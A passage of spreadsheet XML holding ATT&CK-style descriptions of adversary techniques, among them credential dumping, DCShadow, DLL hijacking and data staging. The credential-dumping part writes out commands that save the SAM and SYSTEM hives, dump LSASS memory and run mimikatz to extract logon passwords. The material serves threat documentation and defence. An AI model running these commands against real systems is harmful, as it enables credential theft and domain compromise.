      <t>596061</t>
    </r>
  </si>
  <si>
    <t>For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.59</t>
  </si>
  <si>
    <r>
      <t>Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Spearphishing Attachment</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> campaigns </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6061</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or executed as part of multi-stage malware.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>62</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.</t>
    </r>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <r>
      <t>Adversaries with a sufficient level of access may create a local system or domain account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. The </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>net user</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> commands can be used to create a local or domain account.</t>
    </r>
  </si>
  <si>
    <t>T1003</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</si>
  <si>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t>
  </si>
  <si>
    <t>Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.</t>
  </si>
  <si>
    <t>SAM (Security Accounts Manager)</t>
  </si>
  <si>
    <t>The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.   A number of tools can be used to retrieve the SAM file through in-memory techniques:</t>
  </si>
  <si>
    <t>pwdumpx.exe</t>
  </si>
  <si>
    <t>gsecdump</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>secretsdump.py</t>
  </si>
  <si>
    <t>Alternatively, the SAM can be extracted from the Registry with Reg:</t>
  </si>
  <si>
    <t>reg save HKLM\sam sam</t>
  </si>
  <si>
    <t>reg save HKLM\system system</t>
  </si>
  <si>
    <t>Creddump7 can then be used to process the SAM database locally to retrieve hashes.63</t>
  </si>
  <si>
    <t>Notes: Rid 500 account is the local, in-built administrator. Rid 501 is the guest account. User accounts start with a RID of 1,000+.</t>
  </si>
  <si>
    <t>Cached Credentials</t>
  </si>
  <si>
    <t>The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks.   A number of tools can be used to retrieve the SAM file through in-memory techniques.</t>
  </si>
  <si>
    <t>Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.</t>
  </si>
  <si>
    <t>Notes: Cached credentials for Windows Vista are derived using PBKDF2.</t>
  </si>
  <si>
    <t>Local Security Authority (LSA) Secrets</t>
  </si>
  <si>
    <t>With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets.   When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well.   A number of tools can be used to retrieve the SAM file through in-memory techniques.</t>
  </si>
  <si>
    <t>Notes: The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation.</t>
  </si>
  <si>
    <t>NTDS from Domain Controller</t>
  </si>
  <si>
    <t>Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.64</t>
  </si>
  <si>
    <t>The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.  </t>
  </si>
  <si>
    <t>Volume Shadow Copy</t>
  </si>
  <si>
    <t>Using the in-built Windows tool, ntdsutil.exe</t>
  </si>
  <si>
    <t>Invoke-NinjaCopy</t>
  </si>
  <si>
    <t>Group Policy Preference (GPP) Files</t>
  </si>
  <si>
    <r>
      <t>Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts.   These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6566</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>   The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:  </t>
    </r>
  </si>
  <si>
    <t>Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"</t>
  </si>
  <si>
    <t>Get-GPPPassword67</t>
  </si>
  <si>
    <t>gpprefdecrypt.py</t>
  </si>
  <si>
    <t>  Notes: On the SYSVOL share, the following can be used to enumerate potential XML files. dir /s *.xml</t>
  </si>
  <si>
    <t>Service Principle Names (SPNs)</t>
  </si>
  <si>
    <t>See Kerberoasting.</t>
  </si>
  <si>
    <t>Plaintext Credentials</t>
  </si>
  <si>
    <t>After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM.   SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications.</t>
  </si>
  <si>
    <r>
      <t>The following SSPs can be used to access credentials:   Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>68</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>69</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>   The following tools can be used to enumerate credentials:  </t>
    </r>
  </si>
  <si>
    <t>Windows Credential Editor</t>
  </si>
  <si>
    <t>  As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.   For example, on the target host use procdump:</t>
  </si>
  <si>
    <t>procdump -ma lsass.exe lsass_dump</t>
  </si>
  <si>
    <t>  Locally, mimikatz can be run:</t>
  </si>
  <si>
    <t>sekurlsa::Minidump lsassdump.dmp</t>
  </si>
  <si>
    <t>sekurlsa::logonPasswords</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <r>
      <t>DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API)</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>70717273</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data </t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>74</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Pass the Ticket</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>75</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or change an account's password as noted in </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Account Manipulation</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>76</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> DCSync functionality has been included in the "lsadump" module in Mimikatz.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>77</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>78</t>
    </r>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Credential Dumping</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>79</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>66</t>
    </r>
  </si>
  <si>
    <t>T1214</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</si>
  <si>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t>
  </si>
  <si>
    <t>Example commands to find Registry keys related to password information:80</t>
  </si>
  <si>
    <r>
      <t>Local Machine Hive: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>reg query HKLM /f password /t REG_SZ /s</t>
    </r>
  </si>
  <si>
    <r>
      <t>Current User Hive: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>reg query HKCU /f password /t REG_SZ /s</t>
    </r>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>Adversaries may communicate using a custom command and control protocol instead of using existing Standard Application Layer Protocol to encapsulate commands. Implementations could mimic well-known protocols.</t>
  </si>
  <si>
    <t>T1024</t>
  </si>
  <si>
    <t>Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.</t>
  </si>
  <si>
    <t>Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.</t>
  </si>
  <si>
    <t>Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors.81</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <r>
      <t>DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a Domain Controller (DC).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8283</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.</t>
    </r>
  </si>
  <si>
    <t>Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash.84</t>
  </si>
  <si>
    <r>
      <t>This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>82</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>SID-History Injection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Persistence</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8283</t>
    </r>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>Windows systems use a common method to look for required DLLs to load into a program.85 Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence.</t>
  </si>
  <si>
    <r>
      <t>Adversaries may perform DLL preloading, also called binary planting attacks,</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>86</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>87</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries may use this behavior to cause the program to load a malicious DLL.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>888990</t>
    </r>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</t>
  </si>
  <si>
    <t>T1073</t>
  </si>
  <si>
    <r>
      <t>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>91</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>92</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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T1132</t>
  </si>
  <si>
    <r>
      <t>Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9394</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Some data encoding systems may also result in data compression, such as gzip.</t>
    </r>
  </si>
  <si>
    <t>T1022</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration Over Command and Control Channel</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration Over Alternative Protocol</t>
    </r>
  </si>
  <si>
    <t>T1001</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</si>
  <si>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</si>
  <si>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T1074</t>
  </si>
  <si>
    <r>
      <t>Collected data is staged in a central location or directory prior to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Data may be kept in separate files or combined into one file through techniques such as </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Data Compressed</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Data Encrypted</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Interactive command shells may be used, and common functionality within </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and bash may be used to copy data into a staging location.</t>
    </r>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>T1213</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</si>
  <si>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</si>
  <si>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The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:</t>
  </si>
  <si>
    <t>Policies, procedures, and standards</t>
  </si>
  <si>
    <t>Physical / logical network diagrams</t>
  </si>
  <si>
    <t>System architecture diagrams</t>
  </si>
  <si>
    <t>Technical system documentation</t>
  </si>
  <si>
    <t>Testing / development credentials</t>
  </si>
  <si>
    <t>Work / project schedules</t>
  </si>
  <si>
    <t>Source code snippets</t>
  </si>
  <si>
    <t>Links to network shares and other internal resources</t>
  </si>
  <si>
    <t>Common information repositories:</t>
  </si>
  <si>
    <t>Microsoft SharePoint</t>
  </si>
  <si>
    <t>Found in many enterprise networks and often used to store and share significant amounts of documentation.</t>
  </si>
  <si>
    <t>Atlassian Confluence</t>
  </si>
  <si>
    <t>Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation.</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <r>
      <t>Sensitive data can be collected from local system sources, such as the file system or databases of information residing on the system prior to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Adversaries will often search the file system on computers they have compromised to find files of interest. They may do this using a </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Command-Line Interface</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, such as </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, which has functionality to interact with the file system to gather information. Some adversaries may also use </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Automated Collection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> on the local system.</t>
    </r>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <r>
      <t>Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> may be used to gather information.</t>
    </r>
  </si>
  <si>
    <t>T1025</t>
  </si>
  <si>
    <r>
      <t>Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exfiltration</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Adversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> may be used to gather information. Some adversaries may also use </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Automated Collection</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> on removable media.</t>
    </r>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <r>
      <t>Adversaries may use </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Obfuscated Files or Information</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Scripting</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PowerShell</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, or by using utilities present on the system.</t>
    </r>
  </si>
  <si>
    <r>
      <t>One such example is use of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>certutil</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> to decode a remote access tool portable executable file that has been hidden inside a certificate file.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>95</t>
    </r>
  </si>
  <si>
    <t>Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload.96</t>
  </si>
  <si>
    <r>
      <t>Payloads may be compressed, archived, or encrypted in order to avoid detection. These payloads may be used with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Obfuscated Files or Information</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> during </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Initial Access</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or later to mitigate detection. Sometimes a user's action may be required to open it for deobfuscation or decryption as part of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>User Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
